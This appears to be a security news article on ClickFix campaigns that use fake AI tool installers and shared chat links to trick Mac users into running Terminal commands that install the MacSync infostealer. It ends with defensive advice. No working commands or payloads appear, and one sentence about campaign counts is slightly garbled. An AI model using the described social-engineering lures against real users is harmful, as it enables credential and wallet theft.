MacSync Stealer Spreads via Fake AI Tool Installers in ClickFix Wave

Security researchers have identified three separate ClickFix campaigns distributing the MacSync infostealer to macOS users, all leveraging the surge in AI tool adoption to social-engineer victims into compromising themselves. The campaigns show clear tactical evolution over the past three months, with the latest variant supporting in-memory payload execution to complicate forensic analysis.

The Hacker News reports that between 20 distinct malware campaigns have targeted AI and code-generation tools from February through March 2026, with MacSync emerging as a consistent payload across multiple operations.

Three Campaigns, One Objective

The first campaign, observed in November 2025, used Google search ads promoting a fake "ChatGPT Atlas" browser extension. Users clicking the malvertising were directed to a fraudulent download page hosted on Google Sites—a choice that lent the operation unearned legitimacy. Attempting to download the software triggered a ClickFix prompt instructing victims to run a Terminal command, which installed MacSync.

The second wave took a more creative approach. Attackers created shared ChatGPT conversations that appeared to offer legitimate advice about Mac developer tools. These conversations linked to malicious pages mimicking trusted platforms like GitHub. Again, the infection required victims to copy and execute a Terminal command—the signature ClickFix technique.

By February 2026, the operators had refined their approach. The latest MacSync variant supports dynamic AppleScript payloads and executes primarily in memory, leaving minimal disk artifacts. This iteration targeted Belgium, India, and parts of North and South America, suggesting the operators are testing which regional audiences prove most susceptible.

What MacSync Steals

Once installed, MacSync harvests a broad range of sensitive data from compromised Macs:

• Credentials stored in browsers and password managers
• Keychain database contents
• Documents and files matching specific patterns
• Cryptocurrency wallet seed phrases
• Session tokens and cookies

The stealer exfiltrates this data to attacker infrastructure before cleaning up traces of its presence. The in-memory execution model in the February variant makes post-incident analysis significantly harder—defenders may find evidence of initial compromise but struggle to determine exactly what was taken.

Why ClickFix Works on macOS

ClickFix attacks exploit a fundamental asymmetry: users are conditioned to trust Terminal commands suggested by seemingly legitimate sources. The technique originated targeting Windows users with PowerShell commands but has proven equally effective on macOS.

We've covered ClickFix campaigns targeting Windows users and tracked the evolution of AuraStealer using similar techniques. What's notable about the MacSync campaigns is how effectively they've adapted the approach to macOS-specific social engineering.

Apple users often believe they're less vulnerable to malware—a perception attackers exploit. The "just paste this in Terminal" prompt feels low-risk to users unfamiliar with what these commands can do. And because the victim initiates the action, automated security tools have limited ability to intervene.

Practical Defenses

Organizations with macOS fleets should consider:

1. User education focused on Terminal abuse - Users need to understand that Terminal commands from external sources carry the same risk as downloading unknown executables
2. MDM policies restricting Terminal access - Where feasible, limit which users can execute arbitrary Terminal commands
3. Endpoint detection for AppleScript abuse - The latest variant's dynamic AppleScript payloads should trigger behavioral alerts
4. DNS filtering for known malvertising domains - Block connections to infrastructure associated with these campaigns

The AI tool angle is particularly effective right now. Everyone wants access to the latest models, and attackers know it. Employees searching for ChatGPT alternatives, Claude clients, or AI coding assistants represent high-value targets—they're technically sophisticated enough to follow Terminal instructions but may not recognize when those instructions are malicious.

Broader Context

According to Pillar Security, the 20-plus campaigns targeting AI tools since February represent a coordinated exploitation of current technology trends. MacSync is one of several infostealers being distributed this way, but its consistent presence across multiple operations suggests the operators have established reliable distribution partnerships.

For readers looking to protect themselves from various types of malware, the key lesson here is skepticism toward any installation process that requires Terminal commands. Legitimate software distributed through the Mac App Store or reputable developers doesn't require users to paste commands into Terminal. If an installer asks you to do that, something is wrong.